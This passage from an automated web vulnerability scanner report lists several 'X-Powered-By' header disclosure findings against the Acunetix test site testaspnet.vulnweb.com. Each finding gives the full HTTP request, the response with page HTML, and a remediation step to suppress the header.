          Request
          Request line and header section (328 bytes)
          GET http://testaspnet.vulnweb.com/images/logo_acunetix.gif HTTP/1.1
          Host: testaspnet.vulnweb.com
          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0
          Pragma: no-cache
          Cache-Control: no-cache
          Referer: http://testaspnet.vulnweb.com
          Cookie: ASP.NET_SessionId=s1yels3ja2tusr45pvgdn232
          
          
          Request body (0 bytes)
          Response
          Status line and header section (248 bytes)
          HTTP/1.1 200 OK
          Content-Type: image/gif
          Last-Modified: Thu, 29 May 2008 14:36:55 GMT
          Accept-Ranges: bytes
          ETag: "7228247199c1c81:0"
          Server: Microsoft-IIS/8.5
          X-Powered-By: ASP.NET
          Date: Mon, 25 Jul 2022 13:05:18 GMT
          Content-Length: 2506
          
          
          Response body (2506 bytes)
          Evidence
          X-Powered-By: ASP.NET
          Solution

          Ensure that your web server, application server, load balancer, etc. is configured to suppress "X-Powered-By" headers.

        13. GET http://testaspnet.vulnweb.com/images/rss.gif
          Alert tags
          Alert description

          The web/application server is leaking information via one or more "X-Powered-By" HTTP response headers. Access to such information may facilitate attackers identifying other frameworks/components your web application is reliant upon and the vulnerabilities such components may be subject to.

          Request
          Request line and header section (318 bytes)
          GET http://testaspnet.vulnweb.com/images/rss.gif HTTP/1.1
          Host: testaspnet.vulnweb.com
          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0
          Pragma: no-cache
          Cache-Control: no-cache
          Referer: http://testaspnet.vulnweb.com
          Cookie: ASP.NET_SessionId=s1yels3ja2tusr45pvgdn232
          
          
          Request body (0 bytes)
          Response
          Status line and header section (247 bytes)
          HTTP/1.1 200 OK
          Content-Type: image/gif
          Last-Modified: Thu, 29 May 2008 14:36:55 GMT
          Accept-Ranges: bytes
          ETag: "8e76327199c1c81:0"
          Server: Microsoft-IIS/8.5
          X-Powered-By: ASP.NET
          Date: Mon, 25 Jul 2022 13:05:18 GMT
          Content-Length: 134
          
          
          Response body (134 bytes)
          Evidence
          X-Powered-By: ASP.NET
          Solution

          Ensure that your web server, application server, load balancer, etc. is configured to suppress "X-Powered-By" headers.

        14. GET http://testaspnet.vulnweb.com/login.aspx
          Alert tags
          Alert description

          The web/application server is leaking information via one or more "X-Powered-By" HTTP response headers. Access to such information may facilitate attackers identifying other frameworks/components your web application is reliant upon and the vulnerabilities such components may be subject to.

          Request
          Request line and header section (314 bytes)
          GET http://testaspnet.vulnweb.com/login.aspx HTTP/1.1
          Host: testaspnet.vulnweb.com
          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0
          Pragma: no-cache
          Cache-Control: no-cache
          Referer: http://testaspnet.vulnweb.com
          Cookie: ASP.NET_SessionId=s1yels3ja2tusr45pvgdn232
          
          
          Request body (0 bytes)
          Response
          Status line and header section (222 bytes)
          HTTP/1.1 200 OK
          Cache-Control: private
          Content-Type: text/html; charset=utf-8
          Server: Microsoft-IIS/8.5
          X-AspNet-Version: 2.0.50727
          X-Powered-By: ASP.NET
          Date: Mon, 25 Jul 2022 13:05:17 GMT
          Content-Length: 13269
          
          
          Response body (13269 bytes)
          
          <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" >
          <HTML>
          	<HEAD>
          		<title>login</title>
          		<meta name="vs_showGrid" content="True">
          		<meta name="GENERATOR" Content="Microsoft Visual Studio .NET 7.1">
          		<meta name="CODE_LANGUAGE" Content="C#">
          		<meta name="vs_defaultClientScript" content="JavaScript">
          		<meta name="vs_targetSchema" content="http://schemas.microsoft.com/intellisense/ie5">
          		<LINK href="styles.css" type="text/css" rel="stylesheet">
          	</HEAD>
          	<body>
          		<form name="frmLogin" method="post" action="login.aspx" id="frmLogin">
          <div>
          <input type="hidden" name="__EVENTTARGET" id="__EVENTTARGET" value="" />
          <input type="hidden" name="__EVENTARGUMENT" id="__EVENTARGUMENT" value="" />
          <input type="hidden" name="__VIEWSTATE" id="__VIEWSTATE" value="/wEPDwUKLTIyMzk2OTgxMQ9kFgICAQ9kFgICAQ9kFgQCAQ8WBB4EaHJlZgUKbG9naW4uYXNweB4JaW5uZXJodG1sBQVsb2dpbmQCAw8WBB8AZB4HVmlzaWJsZWhkGAEFHl9fQ29udHJvbHNSZXF1aXJlUG9zdEJhY2tLZXlfXxYBBQ9jYlBlcnNpc3RDb29raWVzwbv+Q8XadeewSqHhJbH9z4dvJw==" />
          </div>
          
          <script type="text/javascript">
          //<![CDATA[
          var theForm = document.forms['frmLogin'];
          if (!theForm) {
              theForm = document.frmLogin;
          }
          function __doPostBack(eventTarget, eventArgument) {
              if (!theForm.onsubmit || (theForm.onsubmit() != false)) {
                  theForm.__EVENTTARGET.value = eventTarget;
                  theForm.__EVENTARGUMENT.value = eventArgument;
                  theForm.submit();
              }
          }
          //]]>
          </script>
          
          
          <div>
          
          	<input type="hidden" name="__VIEWSTATEGENERATOR" id="__VIEWSTATEGENERATOR" value="C2EE9ABB" />
          	<input type="hidden" name="__EVENTVALIDATION" id="__EVENTVALIDATION" value="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" />
          </div>
          			
          <TABLE id="Table1" cellSpacing="0" cellPadding="5" width="790" align="center" border="0">
          	<TR>
          		<TD style="COLOR: #e6dccf" bgColor="#806640" height="75"><a href="https://www.acunetix.com/"><IMG src="images/logo_acunetix.gif" align="absMiddle" border="0" alt="Acunetix website security"></a></TD>
          		<TD style="FONT-WEIGHT: bold; FONT-SIZE: small; COLOR: #e6dccf" align="right" bgColor="#806640"
          			height="75">Test Website for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></TD>
          	</TR>
          </TABLE>
          <TABLE id="Table2" cellSpacing="0" cellPadding="5" width="790" align="center" border="0">
          	<TR>
          		<TD class="MenuBar" style="BORDER-LEFT: #806040 1px solid"><A class="menu" title="About" href="about.aspx">about</A>
          			<A class="menu" title="Latest news" href="default.aspx">news</A> <a href="login.aspx" id="MainMenu1_lnkLog" class="menu" name="lnkLog">login</a>  <a href="Signup.aspx" id="MainMenu1_lnkSignup" class="menu" name="lnkSignup">
          				signup</a> <A class="menu" title="Network scanner" href="https://www.acunetix.com/vulnerability-scanner/network-vulnerability-scanner/">network scanner</A>
          				<A class="menu" title="Network vuln help" href="https://www.acunetix.com/blog/articles/network-vulnerability-assessment-gotchas-avoid/">network vuln help</A>
          		</TD>
          		<td class="MenuBar" align="right" width="50px">
          			<A href="rssFeed.aspx"><IMG src="images/rss.gif" border="0"></A>
          		</td>
          	</TR>
          </TABLE>
          
          			<TABLE id="Table1" cellSpacing="0" cellPadding="10" width="790" align="center" border="0">
          				<TR>
          					<TD vAlign="top" align="center">
          						<TABLE id="Table2" cellSpacing="0" cellPadding="5" border="0" align="center" class="FramedForm">
          							<TR>
          								<TD>Username:</TD>
          								<TD align="right">
          									<input name="tbUsername" type="text" id="tbUsername" class="Login" /></TD>
          							</TR>
          							<TR>
          								<TD>Password:</TD>
          								<TD align="right">
          									<input name="tbPassword" type="password" id="tbPassword" class="Login" /></TD>
          							</TR>
          							<TR>
          								<TD align="left" colSpan="2"><input name="cbPersistCookie" type="checkbox" id="cbPersistCookie" checked="checked" class="classic" />
          									Remember me
          								</TD>
          							</TR>
          							<TR>
          								<TD></TD>
          								<TD align="right">
          									<input type="submit" name="btnLogin" value="Login" id="btnLogin" /></TD>
          							</TR>
          						</TABLE>
          					</TD>
          					<TD vAlign="top" width="200" colSpan="2">
          						<table id="RightPanel1_Calendar" class="Calendar" cellspacing="0" cellpadding="1" title="Calendar" border="0" style="background-color:#E6DCCF;border-width:1px;border-style:Solid;font-size:X-Small;border-collapse:collapse;">
          	<tr><td colspan="7" style="background-color:#E6B873;"><table class="Calendar" cellspacing="0" border="0" style="font-size:X-Small;font-weight:bold;width:100%;border-collapse:collapse;">
          		<tr><td style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8187')" style="color:Black" title="Go to the previous month">&lt;</a></td><td align="center" style="width:70%;">July 2022</td><td align="right" style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8248')" style="color:Black" title="Go to the next month">&gt;</a></td></tr>
          	</table></td></tr><tr><th align="center" abbr="Sunday" scope="col">Sun</th><th align="center" abbr="Monday" scope="col">Mon</th><th align="center" abbr="Tuesday" scope="col">Tue</th><th align="center" abbr="Wednesday" scope="col">Wed</th><th align="center" abbr="Thursday" scope="col">Thu</th><th align="center" abbr="Friday" scope="col">Fri</th><th align="center" abbr="Saturday" scope="col">Sat</th></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8212')" style="color:Black" title="June 26">26</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8213')" style="color:Black" title="June 27">27</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8214')" style="color:Black" title="June 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8215')" style="color:Black" title="June 29">29</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8216')" style="color:Black" title="June 30">30</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8217')" style="color:Black" title="July 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8218')" style="color:Black" title="July 02">2</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8219')" style="color:Black" title="July 03">3</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8220')" style="color:Black" title="July 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8221')" style="color:Black" title="July 05">5</a></td><td align="center" style="width:14%;"><a 
href="javascript:__doPostBack('RightPanel1$Calendar','8222')" style="color:Black" title="July 06">6</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8223')" style="color:Black" title="July 07">7</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8224')" style="color:Black" title="July 08">8</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8225')" style="color:Black" title="July 09">9</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8226')" style="color:Black" title="July 10">10</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8227')" style="color:Black" title="July 11">11</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8228')" style="color:Black" title="July 12">12</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8229')" style="color:Black" title="July 13">13</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8230')" style="color:Black" title="July 14">14</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8231')" style="color:Black" title="July 15">15</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8232')" style="color:Black" title="July 16">16</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8233')" style="color:Black" title="July 17">17</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8234')" style="color:Black" title="July 18">18</a></td><td align="center" style="width:14%;"><a 
href="javascript:__doPostBack('RightPanel1$Calendar','8235')" style="color:Black" title="July 19">19</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8236')" style="color:Black" title="July 20">20</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8237')" style="color:Black" title="July 21">21</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8238')" style="color:Black" title="July 22">22</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8239')" style="color:Black" title="July 23">23</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8240')" style="color:Black" title="July 24">24</a></td><td align="center" style="border-color:#806640;width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8241')" style="color:Black" title="July 25">25</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8242')" style="color:Black" title="July 26">26</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8243')" style="color:Black" title="July 27">27</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8244')" style="color:Black" title="July 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8245')" style="color:Black" title="July 29">29</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8246')" style="color:Black" title="July 30">30</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8247')" style="color:Black" title="July 31">31</a></td><td align="center" style="width:14%;"><a 
href="javascript:__doPostBack('RightPanel1$Calendar','8248')" style="color:Black" title="August 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8249')" style="color:Black" title="August 02">2</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8250')" style="color:Black" title="August 03">3</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8251')" style="color:Black" title="August 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8252')" style="color:Black" title="August 05">5</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8253')" style="color:Black" title="August 06">6</a></td></tr>
          </table><BR>
          <a href="rssFeed.aspx">Get RSS feed</a>
          </TD>
          				</TR>
          				<TR>
          					<TD colSpan="3"></TD>
          				</TR>
          			</TABLE>
          		</form>
          	</body>
          	<div style="background-color:lightgray;width:40%;margin:auto;position:absolute;left:30%;bottom:2px;text-align:center;font-size:12px;padding:1px">
          		<p style="padding-left:5%;padding-right:5%"><b>Warning</b>: This is not a blog. This is a test site for Acunetix. It is vulnerable to SQL Injections, Cross-site Scripting (XSS), and more. It was built using ASP.NET and it shows how bad programming leads to vulnerabilities. Do not visit the links in the comments. They are posted by malicious parties who are trying to exploit this site to their advantage. Comments are purged daily.</p>
          	</div>
          </HTML>
          
          Evidence
          X-Powered-By: ASP.NET
          Solution

          Ensure that your web server, application server, load balancer, etc. is configured to suppress "X-Powered-By" headers.

        15. GET http://testaspnet.vulnweb.com/ReadNews.aspx?id=0
          Alert tags
          Alert description

          The web/application server is leaking information via one or more "X-Powered-By" HTTP response headers. Access to such information may facilitate attackers identifying other frameworks/components your web application is reliant upon and the vulnerabilities such components may be subject to.

          Request
          Request line and header section (341 bytes)
          GET http://testaspnet.vulnweb.com/ReadNews.aspx?id=0 HTTP/1.1
          Host: testaspnet.vulnweb.com
          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0
          Pragma: no-cache
          Cache-Control: no-cache
          Referer: http://testaspnet.vulnweb.com/Comments.aspx?id=0
          Cookie: ASP.NET_SessionId=s1yels3ja2tusr45pvgdn232
          
          
          Request body (0 bytes)
          Response
          Status line and header section (222 bytes)
          HTTP/1.1 200 OK
          Cache-Control: private
          Content-Type: text/html; charset=utf-8
          Server: Microsoft-IIS/8.5
          X-AspNet-Version: 2.0.50727
          X-Powered-By: ASP.NET
          Date: Mon, 25 Jul 2022 13:05:19 GMT
          Content-Length: 22687
          
          
          Response body (22687 bytes)
          
          <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" >
          <HTML>
          	<HEAD>
          		<title>ReadNews</title>
          		<meta content="Microsoft Visual Studio .NET 7.1" name="GENERATOR">
          		<meta content="C#" name="CODE_LANGUAGE">
          		<meta content="JavaScript" name="vs_defaultClientScript">
          		<meta content="http://schemas.microsoft.com/intellisense/ie5" name="vs_targetSchema">
          		<LINK href="styles.css" type="text/css" rel="stylesheet">
          	</HEAD>
          	<body>
          		<form name="Form1" method="post" action="ReadNews.aspx?id=0" id="Form1">
          <div>
          <input type="hidden" name="__EVENTTARGET" id="__EVENTTARGET" value="" />
          <input type="hidden" name="__EVENTARGUMENT" id="__EVENTARGUMENT" value="" />
          <input type="hidden" name="__VIEWSTATE" id="__VIEWSTATE" value="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" />
          </div>
          
          <script type="text/javascript">
          //<![CDATA[
          var theForm = document.forms['Form1'];
          if (!theForm) {
              theForm = document.Form1;
          }
          function __doPostBack(eventTarget, eventArgument) {
              if (!theForm.onsubmit || (theForm.onsubmit() != false)) {
                  theForm.__EVENTTARGET.value = eventTarget;
                  theForm.__EVENTARGUMENT.value = eventArgument;
                  theForm.submit();
              }
          }
          //]]>
          </script>
          
          
          <div>
          
          	<input type="hidden" name="__VIEWSTATEGENERATOR" id="__VIEWSTATEGENERATOR" value="532053C5" />
          	<input type="hidden" name="__EVENTVALIDATION" id="__EVENTVALIDATION" value="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" />
          </div>
          			
          <TABLE id="Table1" cellSpacing="0" cellPadding="5" width="790" align="center" border="0">
          	<TR>
          		<TD style="COLOR: #e6dccf" bgColor="#806640" height="75"><a href="https://www.acunetix.com/"><IMG src="images/logo_acunetix.gif" align="absMiddle" border="0" alt="Acunetix website security"></a></TD>
          		<TD style="FONT-WEIGHT: bold; FONT-SIZE: small; COLOR: #e6dccf" align="right" bgColor="#806640"
          			height="75">Test Website for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></TD>
          	</TR>
          </TABLE>
          <TABLE id="Table2" cellSpacing="0" cellPadding="5" width="790" align="center" border="0">
          	<TR>
          		<TD class="MenuBar" style="BORDER-LEFT: #806040 1px solid"><A class="menu" title="About" href="about.aspx">about</A>
          			<A class="menu" title="Latest news" href="default.aspx">news</A> <a href="login.aspx" id="MainMenu1_lnkLog" class="menu" name="lnkLog">login</a>  <a href="Signup.aspx" id="MainMenu1_lnkSignup" class="menu" name="lnkSignup">
          				signup</a> <A class="menu" title="Network scanner" href="https://www.acunetix.com/vulnerability-scanner/network-vulnerability-scanner/">network scanner</A>
          				<A class="menu" title="Network vuln help" href="https://www.acunetix.com/blog/articles/network-vulnerability-assessment-gotchas-avoid/">network vuln help</A>
          		</TD>
          		<td class="MenuBar" align="right" width="50px">
          			<A href="rssFeed.aspx"><IMG src="images/rss.gif" border="0"></A>
          		</td>
          	</TR>
          </TABLE>
          
          			<TABLE id="Table1" cellSpacing="0" cellPadding="10" width="790" align="center" border="0">
          				<TR>
          					<TD vAlign="top">
          						<DIV id="divNewsDate" class="NewsDate">posted by <strong>admin                    </strong>5/16/2019 12:32:30 PM</DIV>
          						<DIV id="divNewsTitle" class="NewsTitle">Acunetix Vulnerability Scanner Now With Network Security Scans</DIV>
          						<DIV id="divNewsLong" class="NewsLong"><p><strong>London, UK</strong> &ndash; <strong>May 2019</strong> &ndash; Acunetix, the pioneer in automated web application security software, has announced that all versions of the <a href=https://www.acunetix.com/vulnerability-scanner/>Acunetix Vulnerability Scanner</a> now support <a href=https://www.acunetix.com/vulnerability-scanner/network-security-scanner/>network security scanning</a>. Network security scans are possible thanks to the seamless integration of Acunetix with the powerful OpenVAS security solution. Until now, network security scanning functionality was available only in Acunetix Online.</p>     <p>&ldquo;No matter the size of your business, you use multiple security measures to alleviate different types of risks. Your security strategy must always include both web security scans and network security scans. And it makes it so much easier and much more efficient if you can do the two together using a single integrated tool,&rdquo; said Nicolas Sciberras, CTO.</p>     <p>There are many advantages of running network security scans in Acunetix. Having a single integrated dashboard with both web and network vulnerabilities gives the best possible risk visibility and saves a lot of time and effort. Network scans may also benefit from other Acunetix features, such as <a href=https://www.acunetix.com/vulnerability-scanner/acunetix-integrations/>issue tracker integration</a> and <a href=https://www.acunetix.com/vulnerability-scanner/vulnerability-management-regulatory-compliance/>comprehensive reporting</a>.</p>     <p><strong>More Features in the Latest Build</strong></p>     <p>OpenVAS integration is introduced as part of the latest Acunetix version 12 build (<a href=https://www.acunetix.com/blog/releases/new-build-network-scanning-integration-ipv6-support/>build 12.0.190515149</a>). 
This new build also includes:</p>     <p>- Support for IPv6<br />     - Improved usage of machine resources<br />     - Added support for Selenium scripts as import files<br />     - Multiple vulnerability checks for SAP<br />     - Unauthorized access detection for Redis and Memcached<br />     - Source code disclosure for Ruby and Python</p>     <p>The new build also includes a number of updates and fixes, all of which are available for both Windows and Linux. More information can be found <a href=https://www.acunetix.com/blog/releases/new-build-network-scanning-integration-ipv6-support/>here</a>.</p>     <p>Get a demo of the product <a href=https://www.acunetix.com/network-security-scanner/>here</a>.</p>     <p><strong>About Acunetix</strong></p>     <p>User-friendly and competitively priced, Acunetix leads the market in automatic web security testing technology. Its industry-leading crawler fully supports HTML5, JavaScript, and AJAX-heavy websites, enabling the auditing of complex, authenticated applications. Acunetix provides the only technology on the market that can automatically detect out-of-band vulnerabilities and is available both as an online and on-premises solution. Acunetix also includes integrated vulnerability management features to extend the enterprise&rsquo;s ability to comprehensively manage, prioritize, and control vulnerability threats &ndash; ordered by business criticality.</p>     <p><strong>Acunetix, the Company</strong></p>     <p>Founded in 2004 to combat the alarming rise in web application attacks, Acunetix is the market leader and a pioneer in automated web application security technology. From individual consultants to enterprises, penetration testers and security experts globally depend on Acunetix products and technologies. 
It is the tool of choice for many customers across sectors, including Government, Military, Education, Telecommunications, Banking, Finance, and E-Commerce sectors as well as many Fortune 500 companies such as the Pentagon, Harper Collins, Disney, Adobe, and many more.</p></DIV>
          						<TABLE id="Table2" cellSpacing="0" cellPadding="0" width="500" border="0">
          							<TR>
          								<TD vAlign="bottom"><IMG src="images/comment-before.gif"></TD>
          							</TR>
          							<TR>
          								<TD class="Comment" vAlign="middle">
          									<a id="hlComments" href="Comments.aspx?id=0">Read user comments</a></TD>
          							</TR>
          							<TR>
          								<TD vAlign="top"><IMG src="images/comment-after.gif"></TD>
          							</TR>
          						</TABLE>
          						<center>
          						<iframe id="adsFrame" width="200" height="110" style="BORDER-RIGHT: lemonchiffon 1px solid; BORDER-TOP: lemonchiffon 1px solid; BORDER-LEFT: lemonchiffon 1px solid; BORDER-BOTTOM: lemonchiffon 1px solid" frameBorder="no" scrolling="no"></iframe>
          						</center>
          					</TD>
          					<TD vAlign="top" width="200" colSpan="2">
          						<table id="RightPanel1_Calendar" class="Calendar" cellspacing="0" cellpadding="1" title="Calendar" border="0" style="background-color:#E6DCCF;border-width:1px;border-style:Solid;font-size:X-Small;border-collapse:collapse;">
          	<tr><td colspan="7" style="background-color:#E6B873;"><table class="Calendar" cellspacing="0" border="0" style="font-size:X-Small;font-weight:bold;width:100%;border-collapse:collapse;">
          		<tr><td style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8187')" style="color:Black" title="Go to the previous month">&lt;</a></td><td align="center" style="width:70%;">July 2022</td><td align="right" style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8248')" style="color:Black" title="Go to the next month">&gt;</a></td></tr>
          	</table></td></tr><tr><th align="center" abbr="Sunday" scope="col">Sun</th><th align="center" abbr="Monday" scope="col">Mon</th><th align="center" abbr="Tuesday" scope="col">Tue</th><th align="center" abbr="Wednesday" scope="col">Wed</th><th align="center" abbr="Thursday" scope="col">Thu</th><th align="center" abbr="Friday" scope="col">Fri</th><th align="center" abbr="Saturday" scope="col">Sat</th></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8212')" style="color:Black" title="June 26">26</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8213')" style="color:Black" title="June 27">27</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8214')" style="color:Black" title="June 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8215')" style="color:Black" title="June 29">29</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8216')" style="color:Black" title="June 30">30</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8217')" style="color:Black" title="July 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8218')" style="color:Black" title="July 02">2</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8219')" style="color:Black" title="July 03">3</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8220')" style="color:Black" title="July 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8221')" style="color:Black" title="July 05">5</a></td><td align="center" style="width:14%;"><a 
href="javascript:__doPostBack('RightPanel1$Calendar','8222')" style="color:Black" title="July 06">6</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8223')" style="color:Black" title="July 07">7</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8224')" style="color:Black" title="July 08">8</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8225')" style="color:Black" title="July 09">9</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8226')" style="color:Black" title="July 10">10</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8227')" style="color:Black" title="July 11">11</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8228')" style="color:Black" title="July 12">12</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8229')" style="color:Black" title="July 13">13</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8230')" style="color:Black" title="July 14">14</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8231')" style="color:Black" title="July 15">15</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8232')" style="color:Black" title="July 16">16</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8233')" style="color:Black" title="July 17">17</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8234')" style="color:Black" title="July 18">18</a></td><td align="center" style="width:14%;"><a 
href="javascript:__doPostBack('RightPanel1$Calendar','8235')" style="color:Black" title="July 19">19</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8236')" style="color:Black" title="July 20">20</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8237')" style="color:Black" title="July 21">21</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8238')" style="color:Black" title="July 22">22</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8239')" style="color:Black" title="July 23">23</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8240')" style="color:Black" title="July 24">24</a></td><td align="center" style="border-color:#806640;width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8241')" style="color:Black" title="July 25">25</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8242')" style="color:Black" title="July 26">26</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8243')" style="color:Black" title="July 27">27</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8244')" style="color:Black" title="July 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8245')" style="color:Black" title="July 29">29</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8246')" style="color:Black" title="July 30">30</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8247')" style="color:Black" title="July 31">31</a></td><td align="center" style="width:14%;"><a 
href="javascript:__doPostBack('RightPanel1$Calendar','8248')" style="color:Black" title="August 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8249')" style="color:Black" title="August 02">2</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8250')" style="color:Black" title="August 03">3</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8251')" style="color:Black" title="August 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8252')" style="color:Black" title="August 05">5</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8253')" style="color:Black" title="August 06">6</a></td></tr>
          </table><BR>
          <a href="rssFeed.aspx">Get RSS feed</a>
          
          					</TD>
          				</TR>
          				<TR>
          					<TD colSpan="3"></TD>
          				</TR>
          			</TABLE>
          		</form>
          	</body>
          	<div style="background-color:lightgray;width:40%;margin:auto;left:30%;position:fixed;bottom:2px;text-align:center;font-size:12px;padding:1px">
          		<p style="padding-left:5%;padding-right:5%"><b>Warning</b>: This is not a blog. This is a test site for Acunetix. It is vulnerable to SQL Injections, Cross-site Scripting (XSS), and more. It was built using ASP.NET and it shows how bad programming leads to vulnerabilities. Do not visit the links in the comments. They are posted by malicious parties who are trying to exploit this site to their advantage. Comments are purged daily.</p>
          	</div>
          </HTML>
          
          Evidence
